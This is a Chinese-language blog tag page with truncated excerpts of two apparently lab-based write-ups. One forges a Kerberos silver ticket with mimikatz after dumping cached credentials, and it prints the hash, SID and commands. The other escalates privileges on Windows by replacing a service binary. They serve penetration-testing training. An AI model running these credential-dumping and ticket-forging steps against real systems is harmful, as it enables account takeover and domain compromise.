發表文章

目前顯示的是有「iwr」標籤的文章

Active Directory 身分驗證攻擊 (2)

圖片
 Active Directory 身分驗證攻擊 (2) Silver Tickets 使用 jeff / HenchmanPutridBonbon11 登入 Client75 後使用 iwr 搭配 -UseDefaultCredentials  存取 web04,指令 iwr -UseDefaultCredentials http://web04 出現 401 - Unauthorized: Access is denied due to invalid credentials. 創建銀票要三個資訊 1. SPN 密碼 Hash 2. 網域 SID 3. 目標服務的 SPN 使用管理員權限啟動 mimikatz.exe 啟動 debug mode "privilege::debug" 接著輸入 sekurlsa::logonpasswords 來提取快取的 AD 憑證 第一個是服務 iis_service SPN 密碼 Hash 如下圖 4d28cf5252d39971419580a51484ca09 第二個是網域 SID,直接使用 whoami /user 去掉尾碼的 1105 就是我們要的網域 SID S-1-5-21-1987370270-658905905-1781884369 第三個是 SPN,使用之前手動枚舉學過的 setspn -L iis_service 查找 SPN : HTTP/web04.corp.com 三個資訊都有了 1. SPN 密碼 Hash : 4d28cf5252d39971419580a51484ca09 2. 網域 SID : S-1-5-21-1987370270-658905905-1781884369 3. 目標服務的 SPN : HTTP/web04.corp.com 接著透過 mimikatz 創建使用者 jeffadmin 的銀票 指令 kerberos::golden /sid:S-1-5-21-1987370270-658905905-1781884369 /domain:corp.com /ptt /target:web04.corp.com /service:http /rc4:4d28cf5252d39971419580a514...

替換 Windows 服務程式提權

圖片
替換 Windows 服務程式提權 Windows 服務使用 LocalSystem (Token 中包含 NT AUTHORITY\SYSTEM & BUILTIN\Administrators的 SID )、 Network Service、Local Service、User Account 來運行自己的服務。 查看啟動的服務若有 GUI 介面可以直接透過如上圖的方式查看,若僅有 PowerShell 的 UI 可以透過以下不同指令來查找服務,第一種 Get-Service 第二種指令,僅查看 Running 中的服務 Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'} 上述指令在互動式登入會被拒絕,但透過 RDP 再開啟 PowerShell 後即可正常執行 目標 : 現有登入機器的使用者為 dave 為一般使用者,我們將透過提權的方式最後查看 daveadmin 使用者桌面的檔案取得 flag 第三方套件都是值得關注的,尤其看到 XAMPP 這種套件,所以以下兩個是很值得注意 Apache & MySQL,這是因為安裝在 C:\xampp\~ 底下而不是其他系統預設的目錄 所以當時安裝的帳號給予了很大的權限 Name                          State   PathName ----                          -----   -------- Apache2.4                     Running "C:\xampp\apache\bin\httpd.exe" -k runservice my...